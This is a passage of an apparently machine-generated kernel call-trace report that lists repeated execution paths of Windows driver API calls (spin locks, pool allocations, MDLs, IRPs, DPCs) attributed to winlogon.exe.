| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #128 (length: 4, count: 9, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 4 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 9 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c5abe38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #130 (length: 48, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 48 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c5b0e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| IoAllocateIrp | StackSize = 3, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003c831cf0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77c464, SpinLock_unk_out = 0xffffe0003a77c464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77c464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77c464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #131 (length: 17, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 17 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c5b1ef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77f000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #132 (length: 17, count: 18, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 17 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 18 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0x10, ret_val_ptr_out = 0xffffd0002c5b4ef8 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| IoFreeMdl | Mdl_unk = 0xffffe00044551330 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77f000, Tag = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| IoCompleteRequest | ret_val_out = 0x60900 |
Execution Path #134 (length: 58, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 58 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003e5f5550, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xfffff80000000010, ret_val_ptr_out = 0xffffd0002c624e38 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| IoAllocateIrp | StackSize = 3, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003c831cf0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| IoAllocateIrp | StackSize = 3, ChargeQuota = 0, ret_val_unk_out = 0xffffe0003c831cf0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoFreeIrp | Irp_unk = 0xffffe0003c831cf0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #135 (length: 16, count: 14, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 16 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 14 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe00044551330, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xfffff80000000010, ret_val_ptr_out = 0xffffd0002c675e38 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x20e8, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003a77f000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003a77f0e4, Length = 0x2000, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe0003be355f0 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe0003be355f0, MemoryDescriptorList_unk_out = 0xffffe0003be355f0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1f0, SpinLock_unk_out = 0xfffff800fc55c1f0, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1f0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1f0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c1f8, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c1f8, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e1bc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e1bc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| IoFreeMdl | Mdl_unk = 0xffffe0003be355f0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77f000, Tag = 0x0 |
| IoCompleteRequest | ret_val_out = 0x60a00 |
Execution Path #137 (length: 17, count: 4, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 17 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 4 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmMapLockedPagesSpecifyCache | MemoryDescriptorList_unk = 0xffffe0003c58d010, AccessMode_unk = 0x0, CacheType_unk = 0x1, BaseAddress_ptr = 0x0, BugCheckOnFailure = 0x0, Priority_unk = 0xfffff80000000010, ret_val_ptr_out = 0xffffd0002c681e38 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x4106, Tag = 0x32544c46, ret_val_ptr_out = 0xffffe0003afb5000 |
| IoAllocateMdl | VirtualAddress_ptr = 0xffffe0003afb50e4, Length = 0x401e, SecondaryBuffer = 0, ChargeQuota = 0, Irp_unk = 0x0, Irp_unk_out = 0x0, ret_val_unk_out = 0xffffe00044551330 |
| MmBuildMdlForNonPagedPool | MemoryDescriptorList_unk = 0xffffe00044551330, MemoryDescriptorList_unk_out = 0xffffe00044551330 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e1bc, SpinLock_unk_out = 0xffffe0003a77e1bc, ret_val_unk_out = 0x2 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
